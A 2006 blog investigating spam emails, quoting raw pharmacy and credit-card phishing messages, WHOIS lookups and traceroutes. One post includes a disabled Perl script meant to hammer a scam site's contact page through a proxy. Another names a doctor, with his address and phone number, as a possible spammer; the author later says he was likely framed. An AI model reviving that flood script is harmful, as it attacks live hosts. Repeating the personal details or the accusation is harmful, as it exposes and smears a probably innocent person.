Spam Hunter

The Fastest, Most Effective Weight Loss Suplement

2006-04-02T14:33:00.000-04:00

VICTIMX-Account-Key: account3
by VICTIM.com with SMTP; Sun, 02 Apr 2006 11:36:41 -0400
FCC: mailbox://xxenfqoyjxzy@mamma.com/Sent
X-Identity-Key: Id4
Date: Mon, 03 Apr 2006 05:32:33 -0300
From: Leona Jordan <xxenfqoyjxzy@mamma.com>
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: VICTIM@VICTIM.com
Subject: re[2]:
Content-Type: multipart/related;
boundary="------------000005070406060507080002"

This is a multi-part message in MIME format.
--------------000005070406060507080002
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body bgcolor="#FFFFFF" text="#A90930"> <p> <a href="http://dwam039.cutecactuus.com"><IMG SRC="cid:part1.00040701.00020201@mquosulu@moebelheinrich.de" border="0" ALT=""></a></p><p><font color="#FFFFFC">Paul stretched out and laid hold of the jamb in a death grip. in 1823 in 1838 They keep records.</font></p><p><font color="#FFFFF9">Ramage found now, following Geoffrey through the gates and into a thin mist that turned the leaning grave markers into islands, that what should have redeemed with nobility only made it seem all the more horrid. Shinny? Of course. He pushed himself up and tottered erect on his right foot. Then I helped you into your chair so you could write. He wrote undisturbed for the next four hours†ó until the points on all three of the pencils she had sharpened for him were written flat†ó and then he rolled himself back to the bed, got in, and went easily off to sleep. She turned considerately away while he fumbled his penis into the cold tube and urinated. I agree with you</font></p></body></html>


--------------000005070406060507080002
Content-Type:   image/gif;
      name="plume.GIF"
Content-Transfer-Encoding: base64
Content-ID:    <part1.00040701.00020201@mquosulu@moebelheinrich.de>
Content-Disposition: inline;
       filename       =  "plume.GIF"

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
1KMf1RnOUsKTDe4kZz2ZKUtj4jOf/Vzm/zzPqUpbtjOggvRmMeepz4YqdKHsRKg1LTrOgRqUnuw06EGt
6UmJgnOVGd2nPynqSDpO1KP3jKM9TUpPfMIToiddZz7lSVKcNnKmKK1pOM250p9qlKf+hKkRZgrQiLZU
mQ9dqEyRSlE7SlWjUb2lUXXKyqmO9KrbtBNQbXpTqPo0ompAKkCNalKzplSdaj1qInOK1bcekqgxDepS
WQpRscaVpDA1K033+lK9+pWXZ52oX0sKysG69bB21atSMdrYvxIOk3Alqzx9+tC5VtayOAUrZzna08/G
cqyBxWxSCYtYz36WqmEt7GVJK9fTpnS0nVUqbLEpW8t207W1LahHdf9aVM/yNbW3FR9lT3tXgl60srvd
am5vStuxQrenzBXoc6Nr2n8iVrI7re5HGapdyc72tcrNKm6di13sunO9zWSvedFL3c22VrxrOy5xm+rb
0HL2sNLl73ilK1qwere5qk3vft9bYKfuMrkBtqiB61pamxK4rLF17GPly2DQAjjCAn6vYEFKNftK+Lys
VW1gPxxeuqZ3wrPNMF3la2AOQ3eSKmbwhFm81pUmF8ca9u+F3avf7mo3uixeKoqNO8zcOpjCWkVtfNsq
Wh+vuJztdSmC8QreBBdYxqsF6Yuv3GDNfpfJXx5ymMV7YqIqdroZnvKYp3vgFPcVxFPzrYyXnN3/LDP5
yfwEsyLaHOB1Arq319VvnEM7SnTamMp61rJtO2xmHhO5yn5us5ANzeVDOxrAtGsufMvLZ073N7Z9NnMd
/QxnBdN2x4XeMqmDK2o2vzq7q/bwYicdaUY7OdUbfu6gR/3mMwMbhO4l7nxh3WXuVvqsvd7urRG93BvD
FcbqZfZjNw1kWRs7ztt286ePjez/Jlulth42tlGdbOHqOtwUXHO692pi65r6xzCGMoSLGtQc4zqthf2r
vd2dWR0vu8wqFmeZn1zwaqsZ4Ki+tKu3G1mDP5W+ky34ZrmKbnPje9AJNziWnbngfs+6tjn2tJW7DWFf
exjI+U65pm/b5D1/qXzj5O72r7Xt7X6KdKBdfVTL343vGCc540OVN4gLml9xAxvdSWf3RoFO5mCnGuli
pvi1X67tRiud5EGHepQpjemQi32x63YjEXtu9rSzDO1qPxFj3w73uMt97nSvu93vjve8633vfO+73/8O
+MAL/qpt3yHbC494n9M58YxvvOMfD/nIS37ylK+85S+P+cxrfvOc77znPw/60It+9KQvvelPj/rUq570
CQAAIf5waHFnaHVtZWF5bG5sZmR4ZmlyY3ZzY3hnZ2J3a2ZucWR1eHdmbmZvenZzcnRranByZXBnZ3hy
dXRiZGpldnZqam9xcmJtYXF2anFrcXdoYXBhaHdleHRqZ3h3dGNrbGtkYW94ZnFrYXkAOz==

--------------000005070406060507080002--

The message was sent from user-12hcp2b.cable.mindspring.com which means a botnet.

Another Credit Card harvester.
http://dwam039.cutecactuus.com/
This seems like a very cheap amatuer job. There isn't any type of obfusication.
The site doesn't even use any SSL. They do verify that the card will match the algorithm
for each card.

"Please correct following errors and re-submit:
Numbers does not match with VISA pattern!
Please check your numbers and card type then try again."

The comment page even has a image verification. OK, thanks.


#!/usr/bin/perl
use strict;
require LWP::UserAgent;

my $target = 'http://dwam039.cutecactuus.com/contactus.php?validate=img';
my $count;
my $proxy = 'http://127.0.0.1:3128';    #find your own :)

## neutered for your own protection.  Learn some perl and you can write your own!
while (0)
{
  my $ua = LWP::UserAgent->new;
  $ua->proxy(http  => $proxy);
  my $req = HTTP::Request->new(GET => $target);
  my $res = $ua->request($req);
  if ($res->is_success) {
     print localtime() . "\n";
  }
  else {
     print $res->status_line, "\n";
  }
  

}

Dr Spam?

2006-03-10T05:54:00.000-05:00

UPDATE:
After a lot of research I've concluded the name attached to this DNS entry
is NOT the person behind the spamming. Dr Carpenter should not be contacted
in regards to this matter. His address and phone number were easily
found on public web sites and I believe he was simply picked to add legitimacy
to the site. The web site in question appears to simply harvest credit card
numbers and is operated out of Hong Kong. I have left the entry in tact
so anyone can follow my line of reasoning.

-------------------------------------------------------------------------
The most recent spam I investigated leaves me puzzled. No effort to conceal activities for a pharacutical related spam and everything points to a licensed doctor in WA. I'm really speechless. Part of me wants to believe no doctor would be this stupid and risk his license and career. But I must document what I found.
The spam came on a registered email address (I forget where it's from but I believe it was a dev related mailing list.


From - Fri Mar 10 05:25:41 2006
X-Account-Key: account3
X-UIDL: 1141977566.9085.loop.myISP.com,S=3345
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <hasso@aramark.com>
Delivered-To: victim@victim.com
Received: (qmail 9077 invoked from network); 10 Mar 2006 07:59:25 -0000
Received: from unknown (HELO aramark.com) (220.184.165.4)
 by loop.myISP.com with SMTP; Fri, 10 Mar 2006 02:59:25 -0500
Message-ID: <000001c64418$79497940$328ca8c0@can55>
Reply-To: "Moray Hassen" <hasso@aramark.com>
From: "Moray Hassen" <hasso@aramark.com>
To: victim@victim.com
Subject: Re: ParamZcy news
Date: Fri, 10 Mar 2006 02:58:53 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="----=_NextPart_000_0001_01C643EE.9075E240"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

This is a multi-part message in MIME format.

------=_NextPart_000_0001_01C643EE.9075E240
Content-Type: text/plain;
 charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

u V q a i I f i x u p m $1 k 05 (30 Ru  tabIe Qp ts)
n V u i o a h g y r h a $ z 69 (1 Xs 0 t 5D abIets)
k C x i c a i I n i j s $ y 99 (1 Hj 0 tabI gu ets)
=20
And m 5K any other http://pyp44.miltsuil.com

------=_NextPart_000_0001_01C643EE.9075E240
Content-Type: text/html;
 charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dus-ascii">
<META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D3><FONT color=3D#0337ED><span style=3D" =
float : right "> u </span>V<span style=3D" float : right "> q =

</span>a<span style=3D" float : right "> i </span>I<span style=3D" float =
: right "> f </span>i<span style=3D" float : right "> x </span>u<span =
style=3D" float : right "> p </span>m</FONT> <FONT =
color=3D#F1420B>$1<span style=3D" float : right "> k </span>05</FONT> =
(30<span style=3D" float : right "> Ru </span> tabIe<span style=3D" =
float : right "> Qp </span>ts)</FONT></DIV>

<DIV><FONT face=3DArial size=3D3><FONT color=3D#0337ED><span style=3D" =
float : right "> n </span>V<span style=3D" float : right "> u =
</span>i<span style=3D" float : right "> o </span>a<span style=3D" float =
: right "> h </span>g<span style=3D" float : right "> y </span>r<span =
style=3D" float : right "> h </span>a</FONT> <FONT =
color=3D#F1420B>$<span style=3D" float : right "> z </span>69</FONT> =
(1<span style=3D" float : right "> Xs </span>0 t<span style=3D" =
float : right "> 5D </span>abIets)</FONT></DIV>

<DIV><FONT face=3DArial size=3D3><FONT color=3D#0337ED><span style=3D" =
float : right "> k </span>C<span style=3D" float : right "> x =
</span>i<span style=3D" float : right "> c </span>a<span style=3D" float =
: right "> i </span>I<span style=3D" float : right "> n </span>i<span =
style=3D" float : right "> j </span>s</FONT> <FONT =
color=3D#F1420B>$<span style=3D" float : right "> y </span>99</FONT> =
(1<span style=3D" float : right "> Hj </span>0 tabI<span style=3D" =
float : right "> gu </span>ets)</FONT></DIV>

<DIV><FONT face=3DArial size=3D3></FONT> </DIV>
<DIV><FONT face=3DArial size=3D3>And m<span style=3D" float : right "> =
5K </span>any other <A =
href=3D"http://pyp44.miltsuil.com">http://pyp44.miltsuil.com</A></FONT></=
DIV></BODY></HTML>
------=_NextPart_000_0001_01C643EE.9075E240--

The link leads to the miltsuil.com site and aside from a simple redirect the entire operation is straighforward. a trip to SamSpade yields the following:


Server Used: [ whois.yesnic.com ]

miltsuil.com = [ 59.148.144.203 ] 
 ----------------------------------------------- 
  Queried Domain Information as follows 
  ----------------------------------------------- 
  Domain Name : miltsuil.com 
  : :Registrant: : 
   Name      : Richard Carpenter 
   Email     : ostalana@yahoo.com
 
   Address   : 824 S. 295th PL 
   Zipcode   : 98003 
   Nation    : US 
   Tel       : 253-941-4749 
   Fax       : 
  : :Administrative Contact: : 
   Name      : Richard Carpenter 
   Email     : ostalana@yahoo.com
 
   Address   : 824 S. 295th PL 
   Zipcode   : 98003 
   Nation    : US 
   Tel       : 253-941-4749 
   Fax       : 
  : :Technical Contact: : 
   Name      : Richard Carpenter 
   Email     : ostalana@yahoo.com
 
   Address   : 824 S. 295th PL 
   Zipcode   : 98003 
   Nation    : US 
   Tel       : 253-941-4749 
   Fax       : 
  : :Name Servers: : 
   ns0.acorande.com 
   ns0.enanger.com 
  : :Dates & Status: : 
   Created Date   2006-03-07 16: 02: 33 EST 
   Updated Date   2006-03-07 16: 02: 33 EST 
   Valid Date     2007-03-07 16: 02: 33 EST 
   Status         ACTIVE

It's creepy to see a real name and address. I search for the name and phone number listed only to find a list of Family Doctors in WA! See list here


Carpenter, Richard M
30809 1st Ave S
Federal Way, WA 98003-0000


Phonebook results for 253-941-4749
 E Carpenter, (253) 941-4749, , Federal Way, WA 98003

Either this is a very well put together frame (do people get framed for spam??) or this doctor has decided to supplement his income. It's possible since a doctor could get away with creating false prescriptions by the thousands. A doctor in the east coast (New York?) was busted for this last year. But what idiot would attempt this today??

I'm keeping watch over this server and will report any findings. I may have 'scoop' on this one :), the DNS record is barely 48 hours old!

Update: I think this is a setup by Chinese spammers. It was just way to easy and that bugged me from the start. A traceroute shows this

4 ge-0-1-0-030.br2.qcy1.ma.gnaps.net (199.232.44.141) 6.683 ms 6.390 ms 6.565 ms
